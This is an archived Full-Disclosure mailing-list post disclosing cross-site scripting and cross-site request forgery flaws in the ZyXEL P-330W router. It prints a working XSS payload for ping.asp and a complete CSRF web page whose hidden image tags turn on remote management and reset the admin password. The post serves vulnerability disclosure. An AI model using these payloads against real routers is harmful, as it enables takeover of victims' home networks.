Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security FullDisclosure
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Re: [Full-disclosure] Ho Ho H0-Day - ZyXEL P-330W multiple XSS and XSRF

from [Santa Clause] Network Security [Permanent Link]
Subject: Re: [Full-disclosure] Ho Ho H0-Day - ZyXEL P-330W multiple XSS and XSRF vulnerabilities
Date: Thu, 27 Dec 2007 20:27:31 -0600 
Also, because the router uses GoAhead 2.1.1 for its embedded web 
server, it is susceptible to all those vulnerabilities including 
CVE-2002-1951 (buffer overflow), CVE-2002-1603 (ASP source 
disclosure), and more.

-Santa

On Tue, 25 Dec 2007 13:31:20 -0600 Santa Clause 
<santa_clause@hush.com> wrote:

ZyXEL P-330W âSecure Wireless Internet Sharing Routerâ is
vulnerable to multiple XSS and XSRF attacks.

There are a plethora of XSS vulns in the web-based management
interface so I'll leave it to you to discover these gifts on your
own.  Here is a starting point:

http://<router_ip>:<router_port>/ping.asp?pingstr=â><script>alert("
M
erry Christams")</script>

Additionally, no measures are taken to prevent XSRF so pretty much
the whole web-based interface is vulnerable.  Here is an example
of
a web page that if loaded by the victim, turns on remote router
management on port 8080 and changes the admin password to
"santa_pw":

<html><head><title>Chirstmastime is Here</title></head><body>
<img
src="http://<router_ip>:<router_port>/goform/formRmtMgt?webWanAcces
s
=ON&remoteMgtPort=80
80&pingWANEnabled=&upnpEnabled=&WANPassThru1=&WANPassThru2=&WANPass
T
hru3=&
submit-url=%2Fremotemgt.asp" width="0" height="0">
<img
src="http://<router_ip>:<router_port>/goform/formPasswordSetup?user
n
ame=admin&newpass=santa_pw
&confpass=santa_pw&submit-url=%2Fstatus.asp&save=Save" width="0"
height="0">
</body>
</html>

Of course, for any of these attacks to be successful the victim
has
to be recently logged in to the router.

Hope everyone has a Merry Christmas and please don't think Santa
is
a lamer because he posted XSS and XSRF (hey, I've been busy
delivering toys all night and needed a little pick-me-up).

Merry XSSmas, peace on earth, and this year, give the gift of
input
validation.


--
Win the battle of the bulge with great liposuction solutions.
Click now!
http://tagline.hushmail.com/fc/Ioyw6h4eJlsMHREnhDoPYTILkqINo7u2mZMY
2VpNJWbRfE1IZE7gfO/
-Santa Clause

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html


--
Orchard Bank MasterCard
Get your credit on track with an Orchard Bank MasterCard
http://tagline.hushmail.com/fc/JKFkuIjyKFiReuJJqj6WXpV7qcUIj2tOJ1IyWmF1ubEN8NgLe7eZXi/

Hosted and sponsored by Secunia - http://secunia.com/


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • Re: [Full-disclosure] Ho Ho H0-Day - ZyXEL P-330W multiple XSS and XSRF vulnerabilities, Santa Clause <=
Previous by Date:  Re: [Full-disclosure] AOL YGP Picture Editor YGPPicEdit.dll Multiple Buffer Overflows, reepex
Next by Date:  [Full-disclosure] FAQMasterFlexPlus multiple vulnerabilities, Juan Galiana
Previous by Thread:  [Full-disclosure] Multiple vulnerabilities in libnemesi 0.6.4-rc1, Luigi Auriemma
Next by Thread:  [Full-disclosure] FAQMasterFlexPlus multiple vulnerabilities, Juan Galiana
Indexes:  [Date] [Thread] [Top] [All Lists]